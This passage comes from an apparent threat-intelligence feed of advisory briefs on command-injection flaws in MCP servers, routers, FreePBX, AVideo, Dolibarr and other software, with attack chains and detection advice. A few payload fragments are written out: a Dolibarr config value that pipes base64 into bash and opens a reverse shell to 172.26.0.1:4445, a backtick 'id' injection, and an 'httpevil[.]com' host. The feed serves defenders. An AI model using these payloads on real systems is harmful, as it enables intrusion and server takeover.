maintainers were notified through an issue report but have not yet addressed the vulnerability.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies an instance of dvladimirov MCP running a version up to 0.1.0 with the Git Search API enabled.</li>
<li>The attacker crafts a malicious HTTP request targeting the Git Search API endpoint (<code>/gitsearch</code>).</li>
<li>Within the request, the attacker injects a command injection payload into either the <code>repo_url</code> or <code>pattern</code> argument. This payload leverages shell metacharacters (e.g., <code>;</code>, <code>|</code>, <code>&amp;&amp;</code>) to chain malicious commands.</li>
<li>The MCP server receives the request and passes the unsanitized <code>repo_url</code> or <code>pattern</code> value to the GitSearchRequest function in <code>mcp_server.py</code>.</li>
<li>The <code>GitSearchRequest</code> function executes the injected command via a system call, effectively bypassing intended functionality.</li>
<li>The attacker gains arbitrary command execution on the server, potentially allowing them to read sensitive files, modify system configurations, or establish a reverse shell.</li>
<li>The attacker uses the reverse shell to further explore the network and escalate privileges.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this command injection vulnerability allows a remote attacker to execute arbitrary commands on the affected system. This can lead to complete system compromise, including data theft, modification, or destruction. Given the nature of MCP, which likely manages configurations and monitors other systems, a successful attack could cascade to other parts of the infrastructure, potentially affecting numerous systems across the network.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply input validation and sanitization to the <code>repo_url</code> and <code>pattern</code> parameters within the <code>GitSearchRequest</code> function to prevent command injection.</li>
<li>Deploy the Sigma rule <code>Detect MCP Git Search API Command Injection Attempt</code> to detect exploitation attempts targeting CVE-2026-7211.</li>
<li>Monitor web server logs for suspicious requests containing shell metacharacters in the <code>repo_url</code> or <code>pattern</code> parameters as outlined in the Sigma rule and overview sections.</li>
<li>Consider isolating or taking offline affected MCP instances until a patch is available to mitigate the risks associated with CVE-2026-7211.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">threat</category><category>command-injection</category><category>vulnerability</category><category>git-search-api</category></item><item><title>Tenda HG3 2.0 Command Injection Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-04-tenda-hg3-command-injection/</link><pubDate>Mon, 27 Apr 2026 22:16:18 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-tenda-hg3-command-injection/</guid><description>Tenda HG3 2.0 is vulnerable to command injection; by manipulating the datasize argument in the formTracert function of the /boaform/formTracert file, a remote attacker can inject commands.</description><content:encoded><![CDATA[<p>Tenda HG3 2.0 is vulnerable to a command injection vulnerability (CVE-2026-7160) affecting the formTracert function in the /boaform/formTracert file. A remote attacker can exploit this by manipulating the datasize argument to inject arbitrary commands into the system. The vulnerability has a CVSS v3.1 score of 8.8, indicating a high severity. Public disclosure and potential exploitation make this a critical issue for users of the Tenda HG3 2.0 router. Successful exploitation allows an attacker to execute arbitrary commands on the device, potentially leading to complete system compromise.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable Tenda HG3 2.0 router with an exposed web interface.</li>
<li>The attacker crafts a malicious HTTP request targeting the /boaform/formTracert endpoint.</li>
<li>The malicious request includes a manipulated datasize argument designed to inject a command.</li>
<li>The web server processes the request and passes the manipulated datasize argument to the formTracert function.</li>
<li>The formTracert function fails to properly sanitize the input, allowing the injected command to be executed by the system.</li>
<li>The injected command executes with the privileges of the web server process.</li>
<li>The attacker gains arbitrary code execution on the router.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows a remote attacker to execute arbitrary commands on the Tenda HG3 2.0 router. This can lead to complete compromise of the device, including modification of router settings, interception of network traffic, and potential use of the router as a botnet node. Given the high base score of 8.8, this poses a significant risk to affected users.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply available patches or firmware updates provided by Tenda to address CVE-2026-7160.</li>
<li>Monitor web server logs for suspicious POST requests to <code>/boaform/formTracert</code> with unusual <code>datasize</code> parameters, as covered by the Sigma rule &ldquo;Detect Tenda HG3 Command Injection Attempt&rdquo;.</li>
<li>Implement network intrusion detection system (IDS) rules to detect and block exploit attempts targeting this vulnerability.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>command-injection</category><category>cve-2026-7160</category><category>tenda</category></item><item><title>tufantunc ssh-mcp Command Injection Vulnerability (CVE-2026-7039)</title><link>https://feed.craftedsignal.io/briefs/2026-04-ssh-mcp-command-injection/</link><pubDate>Mon, 27 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-ssh-mcp-command-injection/</guid><description>A command injection vulnerability exists in tufantunc ssh-mcp up to version 1.5.0 via manipulation of the Description argument in the shell.write function.</description><content:encoded><![CDATA[<p>A command injection vulnerability, tracked as CVE-2026-7039, affects tufantunc ssh-mcp versions up to 1.5.0. The vulnerability resides in the <code>shell.write</code> function within the <code>src/index.ts</code> file. By manipulating the <code>Description</code> argument, a local attacker can inject arbitrary commands. Publicly disclosed exploits exist, increasing the risk of exploitation. The project maintainers have been notified but have not yet responded. This vulnerability poses a significant risk to systems where ssh-mcp is installed, potentially allowing attackers to execute commands with the privileges of the application.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains local access to a system with tufantunc ssh-mcp installed.</li>
<li>The attacker identifies the vulnerable <code>shell.write</code> function in <code>src/index.ts</code>.</li>
<li>The attacker crafts a malicious input containing shell commands embedded within the <code>Description</code> argument.</li>
<li>The attacker executes a function that calls <code>shell.write</code> with the crafted input.</li>
<li>The <code>shell.write</code> function processes the malicious input without proper sanitization.</li>
<li>The injected shell commands are executed by the system.</li>
<li>The attacker gains unauthorized access to the system or its data.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-7039 allows a local attacker to execute arbitrary commands on the affected system. This can lead to complete system compromise, including data theft, modification, or destruction. Given the publicly available exploit, organizations using vulnerable versions of tufantunc ssh-mcp are at significant risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply any available patches or updates for tufantunc ssh-mcp to remediate CVE-2026-7039.</li>
<li>Monitor process creation events for suspicious commands originating from the ssh-mcp application, using the provided Sigma rule.</li>
<li>Implement strict input validation and sanitization within the <code>shell.write</code> function to prevent command injection.</li>
<li>Review and restrict local access privileges on systems running ssh-mcp to minimize the attack surface.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>vulnerability</category><category>ssh-mcp</category></item><item><title>D-Link DIR-822 A_101 Command Injection via DHCP Hostname</title><link>https://feed.craftedsignal.io/briefs/2026-04-dlink-dir822-cmd-injection/</link><pubDate>Mon, 27 Apr 2026 00:20:13 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-dlink-dir822-cmd-injection/</guid><description>A command injection vulnerability exists in D-Link DIR-822 A_101, specifically within the udhcpd DHCP service; by manipulating the Hostname argument, a remote attacker can inject commands, but the affected product is no longer supported.</description><content:encoded><![CDATA[<p>A command injection vulnerability, tracked as CVE-2026-7067, has been identified in D-Link DIR-822 hardware with firmware version A_101. The vulnerability lies within the udhcpd DHCP service, specifically in the handling of the Hostname argument in the /udhcpcd/dhcpd.c file. A remote attacker can exploit this flaw by injecting arbitrary commands through a crafted Hostname field in a DHCP request. While a proof-of-concept exploit is publicly available, this vulnerability is less impactful because the D-Link DIR-822 A_101 is no longer supported by the vendor, potentially limiting the number of affected devices.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable D-Link DIR-822 A_101 device.</li>
<li>The attacker crafts a malicious DHCP request containing a command injection payload in the Hostname field.</li>
<li>The attacker sends the crafted DHCP request to the vulnerable device.</li>
<li>The udhcpd service parses the DHCP request and extracts the Hostname.</li>
<li>Due to insufficient input validation, the injected command within the Hostname is passed to the <code>system</code> function.</li>
<li>The <code>system</code> function executes the injected command with the privileges of the udhcpd process (typically root).</li>
<li>The attacker achieves arbitrary code execution on the device.</li>
<li>The attacker can then perform actions such as gaining persistent access, modifying device configuration, or using the device as part of a botnet.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this command injection vulnerability allows a remote, unauthenticated attacker to execute arbitrary code on the affected D-Link DIR-822 A_101 device. Given the end-of-life status of the product, patching is unlikely, leaving devices vulnerable. An attacker could leverage this vulnerability to gain complete control of the router, potentially compromising networks connected to it. The specific number of vulnerable devices is unknown, but the impact could be significant if many devices remain in use.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule to detect command injection attempts via DHCP Hostname (Sigma rule: <code>DHCP Hostname Command Injection</code>).</li>
<li>Monitor network traffic for suspicious DHCP requests containing unusual characters or command sequences in the Hostname field, using network monitoring tools.</li>
<li>Consider network segmentation to isolate potentially vulnerable D-Link DIR-822 A_101 devices from critical network resources.</li>
<li>If replacement is not immediately feasible, implement strict access control lists on the firewall to limit access to the D-Link DIR-822 A_101 device&rsquo;s management interface.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>dhcp</category><category>iot</category></item><item><title>Toowiredd chatgpt-mcp-server OS Command Injection Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-04-chatgpt-mcp-server-cmd-injection/</link><pubDate>Sun, 26 Apr 2026 22:17:33 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-chatgpt-mcp-server-cmd-injection/</guid><description>Toowiredd chatgpt-mcp-server up to version 0.1.0 is vulnerable to OS command injection via the file src/services/docker.service.ts of the component MCP/HTTP, allowing for remote exploitation.</description><content:encoded><![CDATA[<p>Toowiredd chatgpt-mcp-server, specifically versions up to 0.1.0, contains an OS command injection vulnerability within the <code>src/services/docker.service.ts</code> file of the MCP/HTTP component. This flaw allows for remote exploitation, potentially enabling attackers to execute arbitrary commands on the underlying operating system. The vulnerability, identified as CVE-2026-7061, has a publicly available exploit, increasing the risk of exploitation. The project maintainers were notified via an issue report but have not yet addressed the vulnerability, making it crucial for defenders to implement mitigation and detection measures. This poses a significant risk to systems running vulnerable versions of chatgpt-mcp-server, as successful exploitation could lead to complete system compromise.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable instance of Toowiredd chatgpt-mcp-server running version 0.1.0 or earlier.</li>
<li>The attacker crafts a malicious HTTP request targeting the MCP/HTTP component.</li>
<li>The request exploits the command injection vulnerability in <code>src/services/docker.service.ts</code>.</li>
<li>The server-side code improperly sanitizes input, allowing the attacker to inject OS commands.</li>
<li>The injected OS command is executed by the server with the privileges of the chatgpt-mcp-server process.</li>
<li>The attacker gains initial access to the system.</li>
<li>The attacker leverages the initial access to escalate privileges or move laterally within the network.</li>
<li>The attacker achieves their objective, such as data exfiltration, deploying malware, or disrupting services.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this OS command injection vulnerability (CVE-2026-7061) in Toowiredd chatgpt-mcp-server can lead to complete system compromise. Attackers can execute arbitrary commands, potentially leading to data breaches, service disruption, or the deployment of malicious software. Given the public availability of the exploit, organizations using this software are at a heightened risk of attack. The lack of a patch from the project maintainers further exacerbates the risk, making proactive detection and mitigation measures essential.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor web server logs for suspicious HTTP requests targeting the MCP/HTTP component of chatgpt-mcp-server, focusing on requests that might be attempting command injection (log source: webserver, product: linux).</li>
<li>Deploy the Sigma rule &ldquo;Detect Suspicious chatgpt-mcp-server Command Injection Attempts&rdquo; to identify exploitation attempts in web server logs.</li>
<li>Restrict access to the chatgpt-mcp-server instance to minimize the attack surface.</li>
<li>Consider deploying a web application firewall (WAF) to filter out malicious requests.</li>
<li>Monitor child processes spawned by the chatgpt-mcp-server process for unexpected or malicious commands (log source: process_creation, product: linux).</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cve-2026-7061</category><category>command-injection</category><category>webserver</category></item><item><title>Linksys MR9600 Command Injection Vulnerability (CVE-2026-6992)</title><link>https://feed.craftedsignal.io/briefs/2026-04-linksys-rce/</link><pubDate>Sun, 26 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-linksys-rce/</guid><description>CVE-2026-6992 is a command injection vulnerability in the Linksys MR9600 router that allows remote attackers to execute arbitrary OS commands by manipulating the 'pin' argument in the BTRequestGetSmartConnectStatus function.</description><content:encoded><![CDATA[<p>A command injection vulnerability, CVE-2026-6992, affects the Linksys MR9600 router, specifically version 2.0.6.206937. The vulnerability resides in the JNAP Action Handler component within the <code>/etc/init.d/run_central2.sh</code> script. Attackers can remotely exploit this flaw by manipulating the <code>pin</code> argument passed to the <code>BTRequestGetSmartConnectStatus</code> function. This allows for the execution of arbitrary operating system commands on the affected device. A public exploit is available, increasing the risk of exploitation. The vendor was notified but did not respond.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker sends a crafted HTTP request to the Linksys MR9600 router.</li>
<li>The request targets the JNAP Action Handler component, specifically the <code>/etc/init.d/run_central2.sh</code> script.</li>
<li>The <code>BTRequestGetSmartConnectStatus</code> function is invoked by the crafted request.</li>
<li>The attacker injects malicious OS commands within the <code>pin</code> argument of the <code>BTRequestGetSmartConnectStatus</code> function.</li>
<li>The router&rsquo;s firmware processes the request, failing to properly sanitize the <code>pin</code> argument.</li>
<li>The injected OS commands are executed with the privileges of the running process, potentially <code>root</code>.</li>
<li>The attacker gains control of the router, potentially allowing for further malicious activities, such as network traffic interception or modification of router settings.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-6992 allows a remote attacker to execute arbitrary commands on the Linksys MR9600 router. This can lead to a complete compromise of the device, allowing the attacker to monitor network traffic, change router configurations, or use the router as a foothold for further attacks within the network. Given the availability of a public exploit, the risk of widespread exploitation is high.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule <code>Detect CVE-2026-6992 Exploitation Attempt</code> to identify exploitation attempts in web server logs.</li>
<li>Apply the Sigma rule <code>Detect Suspicious Shell Activity via Web Request</code> to detect potential command injection attempts.</li>
<li>Monitor web server logs for requests containing suspicious characters in the <code>cs-uri-query</code> field that target <code>/etc/init.d/run_central2.sh</code> to uncover exploitation attempts.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>cve-2026-6992</category><category>command-injection</category><category>router</category><category>rce</category></item><item><title>PicoClaw Web Launcher Management Plane Command Injection Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-04-picoclaw-cmd-injection/</link><pubDate>Sat, 25 Apr 2026 17:16:33 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-picoclaw-cmd-injection/</guid><description>PicoClaw version 0.2.4 is vulnerable to command injection via the /api/gateway/restart endpoint of the Web Launcher Management Plane, allowing a remote attacker to execute arbitrary commands by manipulating input.</description><content:encoded><![CDATA[<p>A command injection vulnerability exists in PicoClaw version 0.2.4, specifically affecting the <code>/api/gateway/restart</code> endpoint within the Web Launcher Management Plane component. This flaw allows unauthenticated remote attackers to inject and execute arbitrary commands on the underlying system. The vulnerability, identified as CVE-2026-6987, stems from improper neutralization of special elements in the input to the <code>/api/gateway/restart</code> function. The project maintainers were notified through an issue report, but as of the time of disclosure, no response or patch has been released. This vulnerability poses a significant risk, potentially leading to full system compromise.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable PicoClaw instance running version 0.2.4.</li>
<li>The attacker crafts a malicious HTTP request targeting the <code>/api/gateway/restart</code> endpoint.</li>
<li>Within the request, the attacker injects OS commands into a parameter processed by the vulnerable function.</li>
<li>The PicoClaw application fails to properly sanitize the attacker-supplied input.</li>
<li>The application executes the injected commands with the privileges of the web server process.</li>
<li>The attacker gains arbitrary code execution on the server.</li>
<li>The attacker uses the initial foothold to escalate privileges, potentially gaining root access.</li>
<li>The attacker installs malware, exfiltrates sensitive data, or performs other malicious activities.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this command injection vulnerability allows a remote attacker to execute arbitrary commands on the affected system. This could lead to complete system compromise, data theft, or denial of service. Given the nature of command injection, the attacker may be able to escalate privileges and gain full control over the server. The number of potential victims is unknown, but any PicoClaw installation running version 0.2.4 exposed to the network is at risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply available patches for PicoClaw as soon as they are released to remediate CVE-2026-6987.</li>
<li>Implement input validation and sanitization on the <code>/api/gateway/restart</code> endpoint to prevent command injection.</li>
<li>Deploy the Sigma rule <code>Detect Suspicious PicoClaw Restart Requests</code> to monitor for exploitation attempts.</li>
<li>Monitor web server logs for unusual activity or suspicious commands executed via HTTP requests, correlating with requests to <code>/api/gateway/restart</code>.</li>
<li>Consider using a web application firewall (WAF) to filter malicious requests targeting the <code>/api/gateway/restart</code> endpoint.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>vulnerability</category><category>web-application</category></item><item><title>IBM Total Storage Service Console (TSSC) / TS4500 IMC Unauthenticated Remote Command Execution</title><link>https://feed.craftedsignal.io/briefs/2026-04-ibm-tssc-rce/</link><pubDate>Thu, 23 Apr 2026 00:16:46 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-ibm-tssc-rce/</guid><description>An unauthenticated user can execute arbitrary commands with normal user privileges on vulnerable IBM Total Storage Service Console (TSSC) / TS4500 IMC versions due to improper validation of user-supplied input, as identified by CVE-2026-5935.</description><content:encoded><![CDATA[<p>CVE-2026-5935 describes a critical vulnerability affecting IBM Total Storage Service Console (TSSC) / TS4500 IMC software. Specifically, versions 9.2, 9.3, 9.4, 9.5, and 9.6 are susceptible to unauthenticated remote command execution. The vulnerability stems from insufficient validation of user-supplied input, allowing an attacker to inject and execute arbitrary commands on the system. Successful exploitation grants the attacker normal user privileges. This vulnerability poses a significant risk as it allows attackers to compromise the system without authentication, potentially leading to data breaches, system disruption, or further lateral movement within the network. Defenders should prioritize patching or mitigating this vulnerability.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An unauthenticated attacker identifies a vulnerable IBM Total Storage Service Console (TSSC) / TS4500 IMC instance running versions 9.2, 9.3, 9.4, 9.5, or 9.6.</li>
<li>The attacker crafts a malicious request containing an OS command injection payload. This payload is designed to exploit the improper input validation within the TSSC/IMC software.</li>
<li>The attacker sends the crafted request to the vulnerable TSSC/IMC instance, targeting a specific endpoint or function susceptible to command injection.</li>
<li>The TSSC/IMC software processes the request without proper validation, passing the malicious payload to the underlying operating system.</li>
<li>The operating system executes the injected command with the privileges of a normal user account.</li>
<li>The attacker gains the ability to execute arbitrary commands on the system, potentially allowing them to read sensitive files, modify configurations, or install malicious software.</li>
<li>The attacker may leverage their initial access to escalate privileges, move laterally within the network, or establish persistent access to the compromised system.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-5935 allows an unauthenticated attacker to execute arbitrary commands on the affected IBM Total Storage Service Console (TSSC) / TS4500 IMC system. This can lead to complete system compromise, data breaches, and disruption of services. The impact could range from unauthorized access to sensitive data to the deployment of ransomware, depending on the attacker&rsquo;s objectives and the level of access achieved after exploitation. Due to the lack of authentication requirement, the vulnerability is highly critical.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the patch or upgrade to a fixed version of IBM Total Storage Service Console (TSSC) / TS4500 IMC as outlined in the IBM advisory (<a href="https://www.ibm.com/support/pages/node/7270127">https://www.ibm.com/support/pages/node/7270127</a>).</li>
<li>Deploy the Sigma rule to detect command execution via web requests targeting TSSC/IMC.</li>
<li>Implement network segmentation to limit the blast radius of a potential compromise of the TSSC/IMC system.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>cve-2026-5935</category><category>rce</category><category>command injection</category></item><item><title>WWBN AVideo Unauthenticated Remote Code Execution via test.php</title><link>https://feed.craftedsignal.io/briefs/2026-04-avideo-rce/</link><pubDate>Wed, 22 Apr 2026 00:16:28 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-avideo-rce/</guid><description>WWBN AVideo versions up to 29.0 contain an OS Command Injection vulnerability (CVE-2026-41064) in the `test.php` file, allowing unauthenticated remote code execution due to insufficient input sanitization, especially affecting `file_get_contents` and `curl` code paths.</description><content:encoded><![CDATA[<p>WWBN AVideo, an open-source video platform, is vulnerable to an unauthenticated remote code execution (RCE) flaw. This vulnerability, identified as CVE-2026-41064, exists in versions up to and including 29.0. The root cause is an incomplete fix applied to the <code>test.php</code> file. While the fix implemented <code>escapeshellarg</code> for the <code>wget</code> command, it neglected to sanitize input for the <code>file_get_contents</code> and <code>curl</code> code paths. Additionally, the URL validation regex <code>/^http/</code> is overly permissive, accepting malicious strings such as <code>httpevil[.]com</code>. Successful exploitation allows attackers to execute arbitrary commands on the server hosting the AVideo platform. The recommended remediation is to apply the updated fix detailed in commit 78bccae74634ead68aa6528d631c9ec4fd7aa536.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker sends a crafted HTTP request to the <code>test.php</code> endpoint.</li>
<li>The request includes a malicious URL, designed to exploit the insufficient input validation in the <code>file_get_contents</code> or <code>curl</code> code paths. For example, using <code>httpevil[.]com</code> to bypass the regex check <code>/^http/</code>.</li>
<li>The <code>test.php</code> script processes the request, attempting to retrieve content from the attacker-controlled URL using either <code>file_get_contents</code> or <code>curl</code>.</li>
<li>Due to the lack of proper sanitization, the malicious URL is interpreted as an OS command.</li>
<li>The server executes the attacker-supplied OS command.</li>
<li>The attacker gains arbitrary code execution on the AVideo server.</li>
<li>The attacker can then perform various malicious activities, such as installing malware, stealing sensitive data, or pivoting to other systems on the network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability (CVE-2026-41064) grants unauthenticated attackers the ability to execute arbitrary code on the affected AVideo server. This can lead to complete compromise of the server, including data theft, defacement, or use as a staging ground for further attacks. Given the platform&rsquo;s use in video hosting, successful attacks could impact numerous users and content creators relying on the vulnerable AVideo instance. The vulnerable regex <code>/^http/</code> and unsanitized functions leave the server open to mass exploitation if exposed to the public internet.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the updated fix detailed in commit 78bccae74634ead68aa6528d631c9ec4fd7aa536 to fully address the input validation issue in <code>test.php</code>.</li>
<li>Deploy the Sigma rule &ldquo;Detect AVideo test.php Command Injection Attempt&rdquo; to detect exploitation attempts in web server logs.</li>
<li>Monitor web server logs for requests to <code>test.php</code> containing suspicious URLs, especially those matching the <code>httpevil[.]com</code> pattern as documented in the IOCs.</li>
<li>Implement a more robust URL validation mechanism that properly sanitizes input before passing it to <code>file_get_contents</code> or <code>curl</code>.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>cve-2026-41064</category><category>avideo</category><category>rce</category><category>command-injection</category></item><item><title>FreePBX API Module Command Injection Vulnerability (CVE-2026-40520)</title><link>https://feed.craftedsignal.io/briefs/2026-04-freepbx-command-injection/</link><pubDate>Tue, 21 Apr 2026 13:16:20 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-freepbx-command-injection/</guid><description>FreePBX api module version 17.0.8 and prior contain a command injection vulnerability in the initiateGqlAPIProcess() function, allowing authenticated users to execute arbitrary commands via crafted GraphQL mutations.</description><content:encoded><![CDATA[<p>FreePBX, a widely used open-source PBX (Private Branch Exchange) system, is vulnerable to a command injection flaw within its API module. Specifically, versions 17.0.8 and earlier are affected by CVE-2026-40520. The vulnerability resides in the <code>initiateGqlAPIProcess()</code> function, where GraphQL mutation input fields are directly passed to the <code>shell_exec()</code> function without proper sanitization or escaping. This allows an authenticated attacker with a valid bearer token to inject and execute arbitrary commands on the underlying host operating system as the web server user. The attack vector involves sending a specially crafted GraphQL <code>moduleOperations</code> mutation containing backtick-wrapped commands within the <code>module</code> field. Successful exploitation grants the attacker the ability to compromise the FreePBX server and potentially pivot to other internal systems.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker authenticates to the FreePBX API using a valid bearer token.</li>
<li>The attacker crafts a GraphQL <code>moduleOperations</code> mutation request.</li>
<li>Within the <code>module</code> field of the mutation, the attacker injects a command using backticks (e.g., <code>\</code>id` `).</li>
<li>The attacker sends the malicious GraphQL request to the <code>/api</code> endpoint.</li>
<li>The <code>initiateGqlAPIProcess()</code> function processes the request without proper sanitization.</li>
<li>The injected command is passed to the <code>shell_exec()</code> function within <code>Api.class.php</code>.</li>
<li>The <code>shell_exec()</code> function executes the injected command on the FreePBX server as the web server user (e.g., <code>www-data</code>, <code>apache</code>).</li>
<li>The attacker gains arbitrary command execution on the server.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this command injection vulnerability (CVE-2026-40520) allows an attacker to execute arbitrary commands on the FreePBX server with the privileges of the web server user. This can lead to complete compromise of the PBX system, allowing the attacker to eavesdrop on calls, modify call routing, steal sensitive data, install malware, and potentially pivot to other systems on the network. Given the critical role of PBX systems in business communications, a successful attack can disrupt operations, damage reputation, and result in significant financial losses.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade the FreePBX API module to a version greater than 17.0.8 to patch CVE-2026-40520.</li>
<li>Deploy the Sigma rule <code>Detect FreePBX GraphQL Command Injection</code> to identify exploitation attempts by detecting backticks in GraphQL mutation requests.</li>
<li>Monitor web server logs for POST requests to the <code>/api</code> endpoint containing GraphQL mutations with backtick-wrapped commands to detect command injection attempts.</li>
<li>Implement input validation and sanitization measures for all GraphQL input fields to prevent command injection vulnerabilities.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>freepbx</category><category>graphql</category><category>cve-2026-40520</category></item><item><title>Dolibarr OS Command Injection via MAIN_ODT_AS_PDF Configuration</title><link>https://feed.craftedsignal.io/briefs/2026-04-dolibarr-rce/</link><pubDate>Sat, 18 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-dolibarr-rce/</guid><description>Dolibarr versions 22.0.4 and earlier are vulnerable to OS Command Injection via the MAIN_ODT_AS_PDF configuration, allowing an authenticated administrator to inject a malicious payload, leading to arbitrary operating system command execution.</description><content:encoded><![CDATA[<p>Dolibarr, a popular open-source ERP and CRM system, is susceptible to OS Command Injection (RCE) in versions up to 22.0.4. This vulnerability, identified as CVE-2026-23500, stems from insufficient validation of the <code>MAIN_ODT_AS_PDF</code> configuration setting. An attacker with administrative privileges can inject malicious commands into this setting, which are then executed by the server during ODT to PDF conversion processes. The vulnerability resides in <code>htdocs/includes/odtphp/odf.php</code>, where the application constructs a shell command using the unfiltered <code>MAIN_ODT_AS_PDF</code> value. Successful exploitation enables arbitrary command execution on the server, potentially leading to complete system compromise.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker gains administrative access to the Dolibarr instance, either through credential compromise or social engineering.</li>
<li>The attacker navigates to the &ldquo;Home -&gt; Setup -&gt; Other Setup&rdquo; section of the Dolibarr administration panel.</li>
<li>The attacker modifies the <code>MAIN_ODT_AS_PDF</code> configuration constant. The injected payload includes a command separator (<code>;</code>) followed by the malicious command. The example uses <code>jodconverter; echo &lt;base64_encoded_command&gt; | base64 -d | bash</code>.</li>
<li>The attacker navigates to the &ldquo;Commerce -&gt; New proposal&rdquo; section.</li>
<li>The attacker creates a new proposal in draft status and selects an ODT template.</li>
<li>The attacker clicks the &ldquo;Generate&rdquo; button, triggering the ODT to PDF conversion process.</li>
<li>The application executes the crafted shell command, resulting in command execution.</li>
<li>In the proof of concept, the attacker establishes a reverse shell connection to their specified IP address (172.26.0.1) and port (4445), gaining interactive shell access.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation allows an attacker with administrator privileges to execute arbitrary commands on the underlying server as the web server user. This can lead to the compromise of sensitive data, modification of application files, and potentially full system compromise. The observed impact includes the establishment of a reverse shell, granting the attacker complete control over the Dolibarr instance. This vulnerability affects Dolibarr installations up to version 22.0.4.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade Dolibarr to a patched version beyond 22.0.4 to remediate CVE-2026-23500.</li>
<li>Monitor process creation events for commands executed with suspicious arguments in <code>MAIN_ODT_AS_PDF</code> by deploying the provided Sigma rules.</li>
<li>Monitor network connections to unusual external IP addresses originating from the web server, especially following events related to document generation. Block the C2 IP address <code>172.26.0.1</code> listed in the IOC table at the network perimeter.</li>
<li>Implement strict access controls and regularly audit administrator accounts to prevent unauthorized access to the Dolibarr configuration settings.</li>
</ul>
